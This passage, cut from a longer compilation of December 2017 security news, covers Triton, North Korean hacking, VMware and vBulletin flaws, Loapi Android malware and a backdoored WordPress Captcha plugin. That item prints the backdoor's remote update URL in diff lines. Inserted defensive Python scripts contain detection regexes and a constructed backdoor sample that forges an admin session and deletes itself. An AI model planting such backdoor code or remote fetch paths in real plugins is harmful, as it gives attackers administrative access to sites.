Core researchers also discovered a stored cross-site scripting (XSS) flaw that could have been leveraged to execute arbitrary code whenever a user accessed a specific URL.

Finally, Trend Micro Smart Protection Server was affected by an improper access control issue that exposed the credentials needed to access monitored servers, along with other information. The credentials were stored in a SQLite database in encrypted form, but the database could be accessed without authentication, and the encryption key was stored in an unprotected location from which an unauthenticated user could download it.

This is not the first time Core researchers have found vulnerabilities in a security product. In late June, the company said it had discovered several potentially serious flaws in Kaspersky Lab’s Anti-Virus for Linux File Server product.


DHS Warns of Malware Targeting Industrial Safety Systems
20.12.2017 securityweek ICS
The National Cybersecurity & Communications Integration Center (NCCIC) of the U.S. Department of Homeland Security (DHS) on Monday published an analysis report on a piece of malware designed to target industrial safety systems.

FireEye and Dragos reported last week that sophisticated malware, tracked by the companies as Triton and Trisis, caused a shutdown at a critical infrastructure organization somewhere in the Middle East. CyberX, a firm that specializes in industrial cybersecurity, believes Iran was likely behind the attack and the target was probably an organization in Saudi Arabia.

The NCCIC, which dubbed the malware “HatMan,” published a report that describes the threat, and provides mitigations and YARA rules.

The Python-based HatMan malware targets Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers, which are designed to monitor processes and restore them to a safe state, or perform a safe shutdown, if a potentially dangerous situation is detected.

The malware communicates with SIS controllers via the proprietary TriStation protocol, and allows attackers to manipulate devices by adding new ladder logic.

The attack on the critical infrastructure organization in the Middle East was discovered after the hackers’ activities resulted in the SIS controller triggering a process shutdown. However, experts believe this was likely an accident, and the final goal may have been to cause physical damage.

The NCCIC pointed out in its report that the malware has two main components: one that runs on a compromised PC and interacts with the safety controller, and one that runs on the controller itself.


“Although by itself HatMan does not do anything catastrophic — safety systems do not directly control the process, so a degraded safety system will not cause a correctly functioning process to misbehave — it could be very damaging when combined with malware that impacts the process in tandem. Were both to be degraded simultaneously, physical harm could be effected on persons, property, or the environment,” NCCIC said in its report.

“It is safe to say that while HatMan would be a valuable tool for ICS reconnaissance, it is likely designed to degrade industrial processes or worse. Overall, the construction of the different components would indicate a significant knowledge about ICS environments — specifically Triconex controllers — and an extended development lifecycle to refine such an advanced attack,” it added.

Schneider Electric has launched an investigation into this incident. The company said there had been no evidence that the malware exploited any vulnerabilities in its products. The automation giant has advised customers not to leave the device in “Program” mode when it is not being configured, as the malware can only deliver its payload if the controller is set to this mode.

“The fact that this actor has the capability to access the safety instrumentation device, and potentially make changes to the device firmware unnoticed, should make critical infrastructure owner-operators sit up and take heed,” said Emily S. Miller, Director of National Security and Critical Infrastructure Programs at Mocana. “Yes, in this case the malware tripped the safety systems and was noticed, but who’s to say the actor won’t learn from its mistakes or hasn’t already?”


North Korea's New Front: Cyberheists
20.12.2017 securityweek BigBrothers
The messages are alluring, the pictures are attractive. But the women seeking to beguile South Korean Bitcoin executives could actually be hackers from Pyongyang in disguise, experts warn.

In the face of sanctions over its banned nuclear and ballistic missile programs, the cash-strapped North is deploying an army of well-trained hackers with an eye on a lucrative new source of hard currency, they say.

Its cyberwarfare abilities first came to prominence when it was accused of hacking into Sony Pictures Entertainment to take revenge for "The Interview", a satirical film that mocked its leader, Kim Jong-Un.

But it has rapidly expanded from political to financial targets, such as the central bank of Bangladesh and Bitcoin exchanges around the world, with Washington this week blaming it for the WannaCry ransomware that wreaked havoc earlier this year.

And a South Korean cryptocurrency exchange shut down on Tuesday after losing 17 percent of its assets in a hacking -- its second cyberattack this year, with the North accused of being behind the first.

According to multiple South Korean reports citing Seoul's intelligence agency, North Korean hackers approach workers at digital exchanges by posing as beautiful women on Facebook, striking up online conversations and eventually sending files containing malicious code.

They also bombard executives with emails posing as job seekers sending resumes -- with the files containing malware to steal personal and exchange data.

Moon Jong-Hyun, director at Seoul cybersecurity firm EST Security, said the North had stepped up online honeytrap tactics targeting Seoul's government and military officials in recent years.

"They open Facebook accounts and maintain the online friendship for months before backstabbing the targets in the end," Moon told a cybersecurity forum, adding many profess to be studying at a US college or working at a research think tank.

- 'Criminal enterprise' -

Simon Choi, director of Seoul cybersecurity firm Hauri, has accumulated vast troves of data on Pyongyang's hacking activities and has been warning about potential ransomware attacks by the North since 2016.

The United States has reportedly stepped up cyberattacks of its own against Pyongyang.

But Choi told AFP: "The North's hacking operations are upgrading from attacks on 'enemy states' to a shady, lucrative moneymaking machine in the face of more sanctions."

Pyongyang's hackers have shown interest in Bitcoin since at least 2012, he said, with attacks spiking whenever the cryptocurrency surges -- and it has soared around 20-fold this year.

US cybersecurity firm FireEye noted that a lack of regulations and "lax anti-money laundering controls" in many countries make digital currencies an "attractive tactic" for the North.

Cryptocurrencies, it said in a September report, were "becoming a target of interest by a regime that operates in many ways like a criminal enterprise".

It documented three attempts by the North to hack into Seoul cryptocurrency exchanges between May and July as a way to "fund the state or personal coffers of Pyongyang's elite".

In October, Lazarus, a hacking group linked with the North, launched a malicious phishing campaign targeting people in the bitcoin industry with a fake but lucrative job offer, according to US cybersecurity firm Secureworks.

- 'Hard to predict' -

Hacking attacks targeting digital currencies are only the latest in the long list of alleged online financial heists by the North.

The North is blamed for a massive $81 million cyber-heist from the Bangladesh Central Bank (BCB) in 2016, as well as the theft of $60 million from Taiwan's Far Eastern International Bank in October.

Although Pyongyang has angrily denied the accusations -- which it described as a "slander" against the authorities -- analysts say the digital footprints left behind suggest otherwise.

The attack on the BCB was linked to "nation-state actors in the North", cybersecurity firm Symantec said, while the Taiwanese bank theft had some of the "hallmarks" of Lazarus, according to the British defence firm BAE Systems.

Proceeds from such actions are laundered through casinos in the Philippines and Macau or money exchanges in China, said Lim Jong-In, a cyber-security professor at Korea University in Seoul, making it "virtually impossible" to trace.

The global WannaCry ransomware attack in May infected some 300,000 computers in 150 nations, encrypting their files and demanding hundreds of dollars from their owners for the keys to get them back.

Experts say that young hacking talents are handpicked at school to be groomed at elite Kim Chaek University of Technology or Kim Il Sung Military University in Pyongyang, and now number more than 7,000.

They were once believed to be operating mostly at home or neighbouring China, but analysis by cybersecurity firm Recorded Future noted "significant physical and virtual North Korean presences" in countries as far away as Kenya and Mozambique.

FireEye CEO Kevin Mandia put the North among a quartet of countries -- along with Iran, Russia and China -- that accounted for more than 90 percent of cybersecurity breaches the firm dealt with.

Its hackers, he said, were "interesting to respond to and hard to predict".


Australia, Canada, Others Blame North Korea for WannaCry Attack
20.12.2017 securityweek BigBrothers
The United States is not the only country to officially accuse North Korea this week of being behind the WannaCry ransomware campaign. Canada, Japan, Australia and New Zealand have also blamed Pyongyang for the attack.

The U.K. accused North Korea in late October, and the other Five Eyes countries and Japan have now done the same.

“We are aware of the statements made by our allies and partners concerning the role of actors in North Korea in the development of the malware known as WannaCry,” said Greta Bossenmaier, chief of Canada’s Communications Security Establishment (CSE). “This assessment is consistent with our analysis.”

Australia said its own intelligence agencies reached the same conclusion after consultations with allies. New Zealand attributed the WannaCry attack to North Korean threat actors based on “cyber threat analysis from a range of sources, including the United States and the United Kingdom.”

The WannaCry ransomware was unleashed in May and it infected roughly 300,000 computers across 150 countries. The malware spread using exploits developed by the Equation Group, an actor linked to the U.S. National Security Agency (NSA).

North Korea in October denied the accusations, claiming that they were a “wicked attempt" to further tighten international sanctions. Furthermore, not everyone believes North Korea is responsible. Endpoint security firm Cybereason said in May that the attack did not fit Pyongyang’s style and interests, and the company stands by its initial assessment.

Nevertheless, the United States is convinced that the WannaCry attack is the work of North Korea, which is believed to be responsible for several recent profit-driven campaigns. “We do not make this allegation lightly,” said White House homeland security advisor Tom Bossert. “We do so with evidence, and we do so with partners.”

One of those partners is Microsoft, which concluded that the North Korea-linked threat actor known as Lazarus – the company tracks it as ZINC – was responsible for the ransomware attack.

“Among other steps, last week we helped disrupt the malware this group relies on, cleaned customers’ infected computers, disabled accounts being used to pursue cyberattacks and strengthened Windows defenses to prevent reinfection. We took this action after consultation with several governments, but made the decision independently,” said Brad Smith, president and chief legal officer at Microsoft.

“We are pleased to see these governments making this strong statement of attribution. If the rising tide of nation-state attacks on civilians is to be stopped, governments must be prepared to call out the countries that launch them,” Smith said.

Facebook also had a role in disrupting the activities of the Lazarus group, but pointed out that its actions were not focused on the WannaCry malware itself.

“In this case, we deleted accounts operated by this group to make it harder for them to conduct their activities. Similar to other threat groups, they largely used personal profiles and pretended to be other people in order to do things like learning about others and building relationships with potential targets,” the social media giant stated.

“We also notified people who may have been in contact with these accounts and gave suggestions to enhance their account security, as we have done in the past about other threat groups,” it added.


Code Execution Flaws Patched in Several VMware Products
20.12.2017 securityweek Vulnerability
VMware has released patches and updates for its ESXi, vCenter Server Appliance (vCSA), Workstation and Fusion products to address a total of four vulnerabilities, including ones that can be exploited for arbitrary code execution.

Two of the code execution flaws, discovered by researchers at Cisco Talos, affect the remote management functionality of VMware ESXi, Workstation and Fusion. While VMware has classified them as having “important” severity, Cisco believes they are critical and assigned them a CVSS score of 9.0.

One of these security holes, CVE-2017-4941, allows a remote attacker to execute code in a virtual machine via an authenticated virtual network computing (VNC) session.

“A specially crafted set of VNC packets can cause a type confusion resulting in stack overwrite, which could lead to code execution. An attacker can initiate a VNC session to trigger this vulnerability,” Cisco Talos said in an advisory.

The second vulnerability found by Cisco researchers also allows an attacker to execute arbitrary code in a virtual machine using specially crafted VNC packets. The bug, described as a heap overflow, is tracked as CVE-2017-4933.

VMware pointed out that exploitation of these flaws is possible in ESXi only if VNC is manually enabled in a virtual machine’s configuration file and the application is set to allow VNC traffic through the built-in firewall.

Another flaw patched this week by VMware is CVE-2017-4940, a stored cross-site scripting (XSS) issue affecting the ESXi Host Client. The weakness, discovered by Alain Homewood of Insomnia Security, allows an attacker to inject code that gets executed when users access the Host Client.

The last vulnerability is a privilege escalation affecting vCSA. Identified by Lukasz Plonka and tracked as CVE-2017-4943, the security hole is related to the showlog plugin and it allows an attacker with low privileges to obtain root level access to the appliance’s base operating system.

VMware fixed the vulnerabilities with the release of six different patches for ESXi, version 12.5.8 of Workstation, version 8.5.9 of Fusion, and version 6.5 U1d of vCSA.


vBulletin Patches Disclosed Vulnerabilities
20.12.2017 securityweek Vulnerability
vBulletin developers announced on Tuesday that they have patched two recently disclosed vulnerabilities that can be exploited by a remote attacker to execute arbitrary code and delete files from the server.

The flaws were disclosed last week by Beyond Security. One of the security holes is a file inclusion issue that affects Windows-based vBulletin installations. It allows an unauthenticated attacker to inject malicious PHP code into a file on the server and “include” that file by manipulating the routestring= parameter in a request, which results in the code getting executed.

The second vulnerability, identified as CVE-2017-17672, is a deserialization issue that can be exploited by an unauthenticated attacker to delete arbitrary files and possibly even execute arbitrary code.

Beyond Security said the flaws were reported to vBulletin on November 21, but the developers of the forum software told SecurityWeek they only learned about them last week. By Monday, a patch had already been developed and was being tested.

The vulnerabilities impact versions 5.3.2, 5.3.3 and 5.3.4. Fixes were rolled out on Tuesday with the release of vBulletin 5.3.4 Patch Level 1, 5.3.3 Patch Level 1, and 5.3.2 Patch Level 2. Forums hosted on vBulletin Cloud have been patched automatically.

“Two potential issues have been identified in vBulletin 5.3.2 and higher,” said Wayne Luke, vBulletin Technical Support Lead. “The first affects the template rendering functionality and could lead to arbitrary file deletion. The second allows the possibility of remote file inclusion via the legacy routing system on Windows servers. We have applied fixes for these issues. It is recommended that you apply this patch as soon as possible.”

It’s important that vBulletin forum administrators patch their installations as soon as possible. Malicious actors can quickly start exploiting the flaws in the wild, especially since technical details and proof-of-concept (PoC) code have been made available for both vulnerabilities.


Windows 10 Hello facial recognition feature can be spoofed with photos
20.12.2017 securityaffairs Safety

Experts discovered that the Windows 10 facial recognition security feature Hello can be spoofed using a photo of an authorized user.
Security experts at pen-test firm Syss have discovered that the Windows 10 facial recognition security feature dubbed Hello can be spoofed in the simplest way, using a photo of an authorized user.

“Microsoft face authentication in Windows 10 is an enterprise-grade identity verification mechanism that’s integrated into the Windows Biometric Framework (WBF) as a core Microsoft Windows component called Windows Hello. Windows Hello face authentication utilizes a camera specially configured for near infrared (IR) imaging to authenticate and unlock Windows devices as well as unlock your Microsoft Passport.”

The bad news for users is that the technique is still effective even if they have installed the fixed versions shipped in October (builds 1703 or 1709). In this scenario, users need to set up facial recognition from scratch to make it resistant to the attack.

“Due to an insecure implementation of the biometric face recognition in some Windows 10 versions, it is possible to bypass the Windows Hello face authentication via a simple spoofing attack using a modified printed photo of an authorized person.” states the security advisory published on Full Disclosure.

The attack devised by the researchers works on both the default config, and Windows Hello with its “enhanced anti-spoofing” feature enabled.

“Thus, by having access to a suitable photo of an authorized person (frontal face photo), Windows Hello face authentication can easily be bypassed with little effort, enabling unauthorized access to the Windows system.” reads the

“Both, the default Windows Hello configuration and Windows Hello with the enabled “enhanced anti-spoofing” feature on different Windows 10 versions are vulnerable to the described spoofing attack and can be bypassed. If “enhanced anti-spoofing” is enabled, depending on the targeted Windows 10 version, a slightly different modified photo with other attributes has to be used, but the additional effort for an attacker is negligible. In general, the simple spoofing attack is less reliable when the “enhanced anti-spoofing” feature is enabled.”


The Proof of Concept (PoC) detailed by the researchers worked against a Dell Latitude running Windows 10 Pro, build 1703, and a Microsoft Surface Pro 4 running build 1607.

The experts tried to use the “enhanced anti-spoofing” feature on the Surface Pro, but said its “LilBit USB IR camera only supported the default configuration and could not be used with the more secure face recognition settings.”

They successfully bypassed the default Windows Hello configuration on both test devices running all tested Windows 10 versions.


Loapi Android malware can destroy your battery mining Monero
20.12.2017 securityaffairs Android

Experts from Kaspersky have spotted an Android malware dubbed Loapi that includes such an aggressive mining component that it can destroy your battery.
Researchers from security firm Kaspersky Lab have spotted a new strain of Android malware, dubbed Loapi, lurking in fake anti-virus and porn applications. It implements many features, including cryptocurrency mining.

Loapi can be used to perform a wide range of malicious activities; thanks to its modular architecture it can also take part in a DDoS botnet or bombard infected handsets with advertisements.

When run for a few days to mine the Monero cryptocurrency, the sample analyzed by Kaspersky physically damaged the device because of the load the activity generated.

“Because of the constant load caused by the mining module and generated traffic, the battery bulged and deformed the phone cover.” reads the analysis published by Kaspersky.


According to the researchers, the Loapi malware is able to destroy an Android device in just 2 days.


The Loapi malware communicates with the following command and control servers:

ronesio.xyz (advertisement module) – used for the aggressive display of advertisements on the infected handset.
api-profit.com:5210 (SMS module and mining module) – used for the manipulation of text messages; it periodically sends requests to the C&C server to obtain relevant settings and commands.
mnfioew.info (web crawler) – used for hidden JavaScript code execution on web pages with WAP billing, in order to subscribe the user to various services.
mp-app.info (proxy module) – implements an HTTP proxy server that allows the attackers to send HTTP requests from the device; it is the component used to power DDoS attacks.

Experts believe the gang behind the Loapi malware is the same one responsible for the 2015 Android malware Podec.

The Loapi malware was distributed through third-party app stores and advertising campaigns.

“Malicious files are downloaded after the user is redirected to the attackers’ malicious web resource. We found more than 20 such resources, whose domains refer to popular antivirus solutions and even a famous porn site. As we can see from the image below, Loapi mainly hides behind the mask of antivirus solutions or adult content apps” continues the analysis.


Once installed, the Loapi malware tries to obtain ‘device administrator’ permissions by looping a pop-up until a victim clicks yes.

The sample analyzed by Kaspersky checks whether the device is rooted but never subsequently uses root privileges; experts believe the cybercriminals will use them in some new module in the future, for example to implement spyware features.

Researchers pointed out that the Android malware “aggressively fights any attempts to revoke device manager permissions” by locking the screen and closing phone windows by itself.


Backdoor in Captcha Plugin poses serious risks to 300K WordPress sites
20.12.2017 securityaffairs Hacking

Experts discovered that the popular WordPress Captcha plugin installed on over 300,000 sites was recently updated to deliver a hidden backdoor.
Security experts at WordFence have discovered that the popular WordPress Captcha plugin installed on over 300,000 sites was recently updated to deliver a hidden backdoor. The WordPress team promptly removed the plugin from the official WordPress Plugins repository and provided sanitized versions for affected customers.

WordPress also blocked the author of the plug-in from publishing updates without the review of its development team, and WordFence now includes firewall rules to block Captcha and five other plugins from the same author.

WordFence has worked with the WordPress plug-in team to patch pre-4.4.5 versions of the plug-in.

The WordPress team noticed something strange in September, when the plug-in changed hands. Just three months later the new team distributed the backdoored version, Captcha 4.3.7.

Experts found code triggering an automatic update process that downloads a ZIP file from:

https://simplywordpress[dot]net/captcha/captcha_pro_update.php

It then extracts and installs the archive, modifying the Captcha plugin installed on the WordPress site.

“Whenever the WordPress repository removes a plugin with a large user base, we check to see if it was possibly due to something security-related. Wordfence alerts users when any plugin they are running is removed from WordPress repo as well. At the time of its removal, Captcha had over 300,000 active installs, so its removal significantly impacts many users.” states the analysis published by WordPress.

“A backdoor file allows an attacker, or in this case, a plugin author, to gain unauthorized administrative access to your website. This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself.”

1 < $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_pro_update.php';
2 ---
3 > $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_free_update.php';
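Review bot: the concern in this hunk is not the swap from captcha_pro_update.php to captcha_free_update.php but that $wptuts_plugin_remote_path still points at simplywordpress.net, an author-controlled host outside the WordPress.org plugin repository; the write-up identifies this remote path as the automatic update that fetches and installs the backdoor ZIP, so code pulled from it bypasses the repository's review entirely. A plugin that ships through the official repository should not carry its own remote update path at all; if a remote fetch cannot be avoided, restrict it to the WordPress.org download host and verify the archive before installing it.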

When WordFence investigated the new ownership of the plugin, it noticed that the domain used to deliver the ZIP file containing the backdoor, simplywordpress[.]net, is registered to someone named Stacy Wellington using the email address scwellington@hotmail.co.uk.

It was easy to discover that the same email address was used to register a large number of other domains and the footer of one of them referenced Martin Soiza.

In September, around 200,000 WordPress websites using the Display Widgets Plugin were impacted after it was updated to include malicious code. Further investigation allowed the experts at WordFence to discover that the man behind the plugin spam was the Briton Mason Soiza (23), who bought the plugin in late May.

WordFence discovered that other plug-ins from the simplywordpress domain (Convert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, and Social Exchange) also contain the same backdoor code.

According to the researchers, the backdoor was used to create cloaked backlinks to various payday loan businesses in order to boost their Google rankings.

“If you have not read our previous post on Mason Soiza, I’d suggest you read that first, since he has a long history of buying WordPress plugins in order to place cloaked backlinks on his users’ sites. He then uses these backlinks to increase page rank in SERPs (Search Engine Results Pages) since only web crawlers such as Googlebot can read them.” states WordPress.

“The hostmaster email address is the same for both simplywordpress.net and unsecuredloans4u.co.uk (Stacy Wellington scwellington@hotmail.co.uk).”

Let me close with the simple recommendation provided by the experts: uninstall the Captcha plugin from your site immediately.
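As an added illustration of how a defender might triage plugin files for the traits described above (an update pulled from an author-controlled host, a forged session for user ID 1, and self-deletion), here is a small Python scanner; it is not Wordfence's or the plugin's code, and the regexes, the trusted-host list, the choice of wp_set_current_user/wp_set_auth_cookie as indicators and both sample PHP sources are constructed assumptions.

```python
"""Scan WordPress plugin PHP sources for the backdoor traits described in the
Captcha plugin write-up: an update downloaded from a host outside wordpress.org,
a forged admin session (user ID 1 plus auth cookies) and a file that deletes
itself after running.

Added example: the regexes, trusted-host list and the sample sources below are
constructed for this illustration, not taken from the plugin or from Wordfence.
"""
import re
from dataclasses import dataclass, field

# Hosts a plugin may legitimately fetch code from (assumption: anything else is
# treated as an author-controlled update channel).
TRUSTED_UPDATE_HOSTS = {"downloads.wordpress.org", "api.wordpress.org"}

# URL ending in an archive or PHP script; group 1 is the host.
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)[^\s'\"]*\.(?:zip|php)", re.I)
# wp_set_current_user() / wp_set_auth_cookie() are real WordPress functions;
# calling them with a literal user ID of 1 forges the default admin session.
ADMIN_SESSION_RE = re.compile(r"wp_set_(?:current_user|auth_cookie)\s*\(\s*1\s*[,)]")
# The write-up notes the backdoor deletes itself once the cookies are set.
SELF_DELETE_RE = re.compile(r"unlink\s*\(\s*__FILE__\s*\)")


@dataclass
class Finding:
    path: str
    indicators: list = field(default_factory=list)

    @property
    def severity(self) -> str:
        # A forged admin session on its own is enough to call it a backdoor;
        # an untrusted update URL alone only warrants a closer look.
        if "forged_admin_session" in self.indicators:
            return "backdoor"
        return "suspicious" if self.indicators else "clean"


def untrusted_update_urls(source: str) -> list:
    """Return every code-download URL whose host is not a trusted channel."""
    return [m.group(0) for m in URL_RE.finditer(source)
            if m.group(1).lower() not in TRUSTED_UPDATE_HOSTS]


def scan_plugin_file(path: str, source: str) -> Finding:
    """Classify one plugin file by the indicators present in it."""
    finding = Finding(path)
    if untrusted_update_urls(source):
        finding.indicators.append("untrusted_update_url")
    if ADMIN_SESSION_RE.search(source):
        finding.indicators.append("forged_admin_session")
    if SELF_DELETE_RE.search(source):
        finding.indicators.append("self_deleting")
    return finding


def scan_plugin(files: dict) -> dict:
    """Scan {path: source} and return {path: severity} for the whole plugin."""
    return {path: scan_plugin_file(path, src).severity for path, src in files.items()}


# Constructed sample sources: one mirrors the behaviour the write-up describes
# (remote path on simplywordpress.net, user-ID-1 session, self-deletion), the
# other is a benign file that only checks capabilities.
BACKDOORED_SAMPLE = r"""<?php
$wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_pro_update.php';
wp_set_current_user(1);
wp_set_auth_cookie(1);
@unlink(__FILE__);
"""

BENIGN_SAMPLE = r"""<?php
$pkg = 'https://downloads.wordpress.org/plugin/example.1.0.0.zip'; // constructed
if ( ! current_user_can( 'manage_options' ) ) {
    return;
}
"""

if __name__ == "__main__":
    plugin = {"captcha/backdoor.php": BACKDOORED_SAMPLE,   # constructed paths
              "captcha/settings.php": BENIGN_SAMPLE}
    for path, src in plugin.items():
        finding = scan_plugin_file(path, src)
        print(f"{path}: {finding.severity} {finding.indicators}")
```

Run it against an unpacked plugin directory by reading each .php file into the dict; a "backdoor" verdict should be treated as a compromised install, not merely an outdated one.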


Singapore Issues Cryptocurrency Warning
19.12.2017 securityweek Security

Singapore Tuesday issued a warning about cryptocurrencies after a recent surge in prices sent investors flocking to bitcoin.

"The Monetary Authority of Singapore advises the public to act with extreme caution and understand the significant risks they take on if they choose to invest in cryptocurrencies," the city-state's central bank said in a statement.

"MAS is concerned that members of the public may be attracted to invest in cryptocurrencies, such as Bitcoin, due to the recent escalation in their prices."

It said the recent spike in bitcoin prices comes from speculation, and cautioned that the bubble may burst.

Singapore's central bank joins a number of regulators who have warned about cryptocurrency investments, including the US Federal Reserve, which said bitcoin could threaten financial stability.

Regulators in Seoul have banned South Korean financial institutions from dealing in virtual currencies.

The MAS, which also acts as a financial regulator in the city-state, noted that cryptocurrencies are not backed by any central bank and are unregulated, which means those who lose money after investing in them have no room for redress under Singapore law.

"There is also a risk of loss should the cryptocurrency intermediary be hacked, as it may not have sufficiently robust security features," the regulator said.

Earlier on Tuesday, a South Korean virtual currency exchange declared itself bankrupt after being hacked for the second time in a year.

The closure comes eight months after nearly 4,000 bitcoin -- then valued at 5.5 billion won ($5 million), nearly 40 percent of the exchange's total assets -- were stolen in a cyber-attack blamed on North Korea.

Global bitcoin prices have soared around 20-fold this year, with the cryptocurrency trading above $18,000 on Tuesday.

Created in 2009 as open-source software, bitcoin has been used to buy everything from beer to pizza, and is increasingly accepted by major companies such as online travel giant Expedia.

Analysts have put the surge down to growing acceptance among traditional investors and a decision by US regulators to allow bitcoin futures to trade on major exchanges.

Previously only traded on specialist platforms, bitcoin started trading on the Cboe Futures Exchange earlier this month before hitting the major Chicago Mercantile Exchange (CME) on Monday.


Loapi Android Trojan Does All Sorts of Bad
19.12.2017 securityweek Android
A recently discovered Android malware features a modular architecture that allows it to perform a broad range of nefarious activities, Kaspersky Lab researchers warn.

Detected by Kaspersky as Trojan.AndroidOS.Loapi, the malicious program was found masquerading as antivirus solutions or adult content apps. Its capabilities, the security researchers say, range from mining for cryptocurrencies to displaying a constant stream of ads and to launching distributed denial of service (DDoS) attacks, among others.

The mobile threat was observed being distributed via advertising campaigns that redirected users to the attackers’ malicious websites. After installation, the malware attempts to gain device administrator rights, requesting them in a loop until the user gives in. Although it checks whether the device is rooted, the Trojan doesn’t use root privileges.

If the user gives in and grants the malicious app admin privileges, Loapi either hides its icon in the menu or simulates antivirus activity. The displayed behavior depends on the type of application it masquerades as, Kaspersky has discovered.

The Trojan can prevent users from revoking its device manager permissions by locking the screen and closing the window with device manager settings. Moreover, the malware receives from the command and control (C&C) server a list of apps that could pose a danger and uses it to monitor the installation and launch of those apps.

When such an app is installed or launched, the Trojan displays a fake message claiming it has detected malware, prompting the user to delete it. The message is displayed in a loop, thus preventing the user from dismissing it until the application is deleted.

At installation, Loapi receives from the C&C the lists of modules to install or remove, a list of domains that serve as C&C, an additional reserve list of domains, the list of “dangerous” apps, and a flag indicating whether to hide its app icon. In a third stage, the necessary modules are downloaded and initialized.

An advertisement module is used to aggressively display ads on the device, but can also be used to open URLs, create shortcuts, show notifications, open pages in popular social network apps (including Facebook, Instagram, VK), and download and install other applications.

An SMS module can perform various text message manipulation operations. Based on C&C commands, it can upload inbox SMS messages to the attackers’ server, reply to incoming messages, send SMS messages with specified text to a specified number, delete SMS messages from the inbox and sent folder, and fetch a URL and run specified JavaScript code in the page received as the response.

A Web crawling module can subscribe users to services by covertly executing JavaScript code on web pages with WAP billing, in addition to performing web page crawling. Should operators send text messages asking for confirmation, the SMS module is employed to reply with the required text. Together with the ad module, it was observed attempting to open 28,000 unique URLs on a single device during a 24-hour experiment.

The Trojan also packs a proxy module that lets attackers send HTTP requests from the victims’ devices via an HTTP proxy server. This lets the malware authors mount DDoS attacks against specified resources; the module can also change the Internet connection type on a device, the security researchers warn.

Another module uses the Android version of minerd to mine for the Monero (XMR) cryptocurrency.

According to Kaspersky, Loapi might be related to the Podec malware (Trojan.AndroidOS.Podec), as both threats use the same C&C server IP address, both use the same obfuscation, and feature similar ways of detecting superuser on the device. Moreover, both collect information with similar structure and content and send it in JSON format to the C&C during the initial stage.

“Loapi is an interesting representative from the world of malicious Android apps. Its creators have implemented almost the entire spectrum of techniques for attacking devices […]. The only thing missing is user espionage, but the modular architecture of this Trojan means it’s possible to add this sort of functionality at any time,” Kaspersky concludes.
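Loapi needs the device-administrator role to lock the screen and resist removal, and it arrives through ads and third-party stores rather than Google Play, so an active device admin among a phone's third-party packages whose installer is not the Play Store deserves a close look. The adb triage script below is an added example, not part of Kaspersky's write-up; it assumes the text layout of 'dumpsys device_policy' and 'pm list packages -3 -i' on current Android builds, and the SAMPLE_* strings (with made-up package names) are constructed so it runs offline.

```python
"""Triage an Android device over adb for Loapi-style abuse of the
device-administrator role (added example, not Kaspersky's tooling)."""
import re
import subprocess

PLAY_STORE = "com.android.vending"


def adb_shell(command):
    """Run a shell command on the attached device and return its stdout."""
    result = subprocess.run(["adb", "shell", command], capture_output=True, text=True, check=True)
    return result.stdout


def parse_active_admins(dumpsys_text):
    """Package names listed under 'Enabled Device Admins' in dumpsys device_policy."""
    admins = []
    in_section = False
    for line in dumpsys_text.splitlines():
        if "Enabled Device Admins" in line:
            in_section = True
            continue
        if not in_section:
            continue
        indent = len(line) - len(line.lstrip(" "))
        if line.strip() and indent < 4:          # back to a top-level heading
            in_section = False
            continue
        m = re.match(r"\s*([\w.]+)/\S+:$", line)  # "    pkg/.AdminReceiver:"
        if m and indent == 4:
            admins.append(m.group(1))
    return admins


def parse_installers(pm_text):
    """Map package name -> installer from 'pm list packages -i' output."""
    installers = {}
    for line in pm_text.splitlines():
        m = re.match(r"package:(\S+)\s+installer=(\S+)", line)
        if m:
            installers[m.group(1)] = m.group(2)
    return installers


def suspicious_admins(dumpsys_text, third_party_pm_text):
    """Active admins that are third-party apps not installed from Google Play."""
    installers = parse_installers(third_party_pm_text)
    return [
        (pkg, installers[pkg])
        for pkg in parse_active_admins(dumpsys_text)
        if pkg in installers and installers[pkg] != PLAY_STORE
    ]


# Constructed sample output; the package names are made up for the example.
SAMPLE_DUMPSYS = """Current Device Policy Manager state:
  Device Owner:
  Enabled Device Admins (User 0, provisioningState: 0):
    com.example.mdm/.receivers.DeviceAdminReceiver:
      uid=10100
      testOnlyAdmin=false
      policies:
        force-lock
        wipe-data
    com.example.fakeav/.DevAdminReceiver:
      uid=10234
      testOnlyAdmin=false
      policies:
        force-lock
  Encryption Status: 0
"""

SAMPLE_PM = """package:com.example.mdm  installer=com.android.vending
package:com.example.fakeav  installer=null
package:org.mozilla.firefox  installer=com.android.vending
"""

if __name__ == "__main__":
    dumpsys = adb_shell("dumpsys device_policy")
    packages = adb_shell("pm list packages -3 -i")
    for pkg, installer in suspicious_admins(dumpsys, packages):
        print(f"device admin {pkg} installed by {installer}: review and remove")
```

Note that 'pm uninstall' fails while the package is still an active device admin; deactivate it first under Settings > Security > Device administrators, booting into safe mode if the Trojan keeps locking the screen.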


Successor to NetTraveler Malware Dissected
19.12.2017 securityweek Virus
A recently observed backdoor could be intended as the successor of the NetTraveler malware, Kaspersky Lab security researchers report.

NetTraveler has been around for more than a decade, but has recently resurfaced in a series of cyber-espionage attacks launched against victims in Russia and neighboring European countries. Several years ago, the malware was associated with a campaign that hit targets in over 40 countries.

The malware was designed for surveillance purposes, and a new variant referred to as Travle or PYLOT appears to have emerged earlier this year. Believed to be the work of a Chinese-speaking actor, the new threat gets its name from a typo in a string in one of the analyzed samples: “Travle Path Failed!” (the typo has been corrected in newer releases).

The malware was observed being deployed using malicious documents delivered via spear-phishing attacks on Russian-speaking targets. The executables were maintained in encrypted form using a technique previously used to conceal Enfal, and then the Microcin APT family.

Travle command and control (C&C) domains often overlap with those of Enfal, which in turn was observed using the same encryption method for maintaining the C&C URL as NetTraveler. Thus, Kaspersky believes that Enfal, NetTraveler, Travle and Microcin are related to each other and that the Travle backdoor is the successor of NetTraveler.

Upon initializing communication with its C&C server, the malware sends information about the target operating system in an HTTP POST request. Sent information includes UserID (based on the computer name and IP-address), Computer name, Keyboard layout, OS version, IP-addresses, and MAC address.

The server responds by sending URL paths for receiving commands, for reporting on command execution results, and for downloading and uploading files from C&C. The server also provides the first and second RC4 key, and an ID. After receiving the packet, the backdoor waits for additional commands.

